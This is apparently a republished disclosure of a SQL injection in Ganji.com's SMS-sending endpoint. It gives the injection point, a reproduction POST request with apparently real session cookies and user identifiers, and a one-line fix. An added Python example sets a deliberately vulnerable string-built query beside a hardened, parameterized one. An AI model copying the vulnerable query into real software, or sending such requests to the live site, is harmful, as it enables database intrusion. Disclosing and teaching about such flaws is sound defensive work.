
Ganji.com main site SQL injection

程序员文章站 2022-07-03 08:23:19

While doing a friendly security check of Ganji.com, I found a SQL injection.

The injection point is: POST /sms/post/send.php?ad-ref=sms&content=&unique_id=house_premier_puid_2105604786&domain=bj

Submitting the following POST request reproduces it:

POST /sms/post/send.php?ad-ref=sms&content=&unique_id=house_premier_puid_2105604786&domain=bj HTTP/1.1
Host: www.ganji.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: https://www.ganji.com
Content-Length: 36
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17
Referer: https://www.ganji.com/sms/post/send.php?ad-ref=sms&content=&unique_id=house_premier_puid_2105604786&domain=bj
Cookie: GANJISESSID=46c52b9dcc974165c0e33519bbfa523c; GDNETSSOC=userm=VyTZ2dihqf/lFqYOnuG+LsFj5g8EM/BDydXx+OJyjr9D8l68blL03Zws8S7d8e78fXVEBrZ+ODFFEaSUvHlu1w==; GanjiUserInfo=%7B%22user_id%22%3A679736482%2C%22email%22%3A%22%22%2C%22username%22%3A%22crazykb%22%2C%22user_name%22%3A%22crazykb%22%2C%22nickname%22%3A%22%22%7D; GanjiUserName=crazykb; NTKF_T2D_CLIENTID=guest9EEBBB3F-823F-0FF9-FF32-6952CA0D067D; STA_DS=1; __utma=32156897.1389085893.1462858572.1463041380.1463389095.7; __utmb=32156897.16.10.1463389095; __utmc=32156897; __utmganji_v20110909=0x96ed933a06e976ba3abd755d9fd4a1a; __utmt=1; __utmz=32156897.1462890272.4.4.utmcsr=hrvip.ganji.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _gl_tracker=%7B%22ca_source%22%3A%22-%22%2C%22ca_name%22%3A%22-%22%2C%22ca_kw%22%3A%22-%22%2C%22ca_id%22%3A%22-%22%2C%22ca_s%22%3A%22self%22%2C%22ca_n%22%3A%22-%22%2C%22ca_i%22%3A%22-%22%2C%22sid%22%3A51338894992%2C%22kw%22%3A%22%E5%80%A1%E4%B9%90%E7%94%B5%E5%AD%90%22%7D; bizs=%5B%5D; cityDomain=bj; citydomain=bj; ganji_uuid=6097496099331051159669-512701341; ganji_xuuid=4dc75f09-1766-4188-af6f-729069c8effa.1462858577365; gj_inner_acc=1-110465; iframe_resume_time=2; last_name=crazykb; mobversionbeta=2.0; nTalk_CACHE_DATA={uid:kf_10111_ISME9754_679736482}; sscode=90NyPnFU1Fj2R2aM90AkgQ%2BX; supercookie=Awp5AmZ2AQtlWTMvLmLlAQtkAJD1BTD1LJR2BGIzZQDlMJEzLzWvZmNmAJIvMGIvLGZ%3D; vip_version=new

phone=XXXXXX&code=&countTime=-1

Here XXXXXX is a personal mobile phone number.


Remediation:

Filter the input.
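As an added example (not code from the original report or from Ganji.com), the pattern that produces this class of bug beside the remediation the report calls for: strict input filtering plus a parameterized query. It uses an in-memory SQLite table in place of the site's database; the table schema, the sample rows and the assumption that the phone field is the injected parameter are all constructed for illustration.

```python
import re
import sqlite3

# Constructed sample rows standing in for the site's user table (hypothetical schema).
SAMPLE_USERS = [
    (1, "13800000001", "crazykb"),
    (2, "13800000002", "someone"),
]

# Allowlist for a mainland China mobile number: exactly 11 digits, starting with 1.
PHONE_RE = re.compile(r"^1\d{10}$")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, phone TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, phone):
    # The injection pattern: the request value is spliced into the SQL text,
    # so quote characters in it change the query instead of being matched as data.
    sql = f"SELECT id, name FROM users WHERE phone = '{phone}'"
    return conn.execute(sql).fetchall()


def validate_phone(phone):
    # Input filtering: reject anything that is not a plausible mobile number.
    if not isinstance(phone, str) or not PHONE_RE.match(phone):
        raise ValueError("invalid phone number")
    return phone


def lookup_hardened(conn, phone):
    # Validation plus a bound parameter: the value is sent as data, never parsed as SQL.
    phone = validate_phone(phone)
    sql = "SELECT id, name FROM users WHERE phone = ?"
    return conn.execute(sql, (phone,)).fetchall()


def hardened_rejects(conn, phone):
    # True when the hardened lookup refuses the value at the validation step.
    try:
        lookup_hardened(conn, phone)
    except ValueError:
        return True
    return False
```

Either defence alone stops the tautology case; keeping both means a bug in one check does not expose the query.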